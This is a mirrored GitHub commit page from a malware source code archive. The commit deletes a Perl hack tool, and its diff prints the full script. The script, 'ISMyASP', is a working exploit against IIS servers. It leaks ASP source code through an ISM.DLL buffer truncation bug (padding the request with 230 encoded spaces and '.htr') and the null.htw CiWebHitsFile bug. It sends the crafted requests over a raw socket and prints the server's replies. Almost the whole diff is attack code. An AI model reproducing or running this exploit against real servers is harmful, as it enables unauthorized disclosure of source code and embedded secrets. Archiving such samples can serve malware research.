mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-31 06:17:26 +00:00
Delete HackTool.Perl.Aspviewer
na
This commit is contained in:
vxunderground
GitHub
parent
0c916e7bd9
commit
f181862a0a
@ -1,85 +0,0 @@
|
||||
#----------------------------------------------------------------#
|
||||
# [ISMyASP] #
|
||||
# IIS ASP source code viewer using ISM.DLL buffer truncation bug #
|
||||
# and null.htw bug #
|
||||
# LoWNOISE Colombia 5/2000 #
|
||||
# Efrain 'ET' Torres et@cyberspace.org #
|
||||
#----------------------------------------------------------------#
|
||||
# Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb. #
|
||||
#----------------------------------------------------------------#
|
||||
# Some f() from wwwboard.pl by S.Sparling #
|
||||
#----------------------------------------------------------------#
|
||||
|
||||
use Socket;
|
||||
|
||||
$port=80;
|
||||
|
||||
if (!($ARGV[0])) {
|
||||
print "\n[ISMyASP]\n";
|
||||
print "$0 http://host/view.asp \n";
|
||||
print "ET LoWNOISE Colombia.\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
$url=$ARGV[0];
|
||||
|
||||
chop($url) if $url =~ /\n$/;
|
||||
print "url: $url\n";
|
||||
|
||||
$remote = $url;
|
||||
$remote =~ s/http\:\/\///g;
|
||||
$remote =~ s/\/([^>]|\n)*//g;
|
||||
print "host: $remote\n";
|
||||
|
||||
$path = $url;
|
||||
$path =~ s/http\:\/\///g;
|
||||
$path =~ s/$remote//g;
|
||||
print "path: $path\n";
|
||||
|
||||
|
||||
$spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t
|
||||
#REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME
|
||||
#READ THE CERBERUS CISADV000327.
|
||||
|
||||
$submit = "GET $path";
|
||||
|
||||
$i=0;
|
||||
while($i < $spaces)
|
||||
{
|
||||
$submit= "$submit%20";
|
||||
$i++;
|
||||
|
||||
}
|
||||
$submit= "$submit.htr HTTP/1.0\n\n";
|
||||
|
||||
print "======Trying ism.dll buffer truncation...\n";
|
||||
print "submit: $submit\n\n";
|
||||
|
||||
&post_message;
|
||||
|
||||
print "======Trying null.htw...\n";
|
||||
$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
|
||||
print "submit: $submit\n\n";
|
||||
|
||||
&post_message;
|
||||
|
||||
sub post_message
|
||||
{
|
||||
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
|
||||
die("No port specified.") unless $port;
|
||||
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
|
||||
$paddr = sockaddr_in($port, $iaddr);
|
||||
$proto = getprotobyname('tcp');
|
||||
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
|
||||
connect(SOCK, $paddr) || die("Unable to connect: $!");
|
||||
send(SOCK,$submit,0);
|
||||
printf "\n======Waiting for reply [pray]....\n\n";
|
||||
while(<SOCK>) {
|
||||
print $_;
|
||||
}
|
||||
close(SOCK);
|
||||
}
|
||||
|
||||
print "\n\n======THE END. [LoWNOISE]\n";
|
||||
exit;
|
||||
#:) narco.guerrilla&gov.sucks.co (huge :x to PO-K)
|
||||
Loading…
Reference in New Issue
Block a user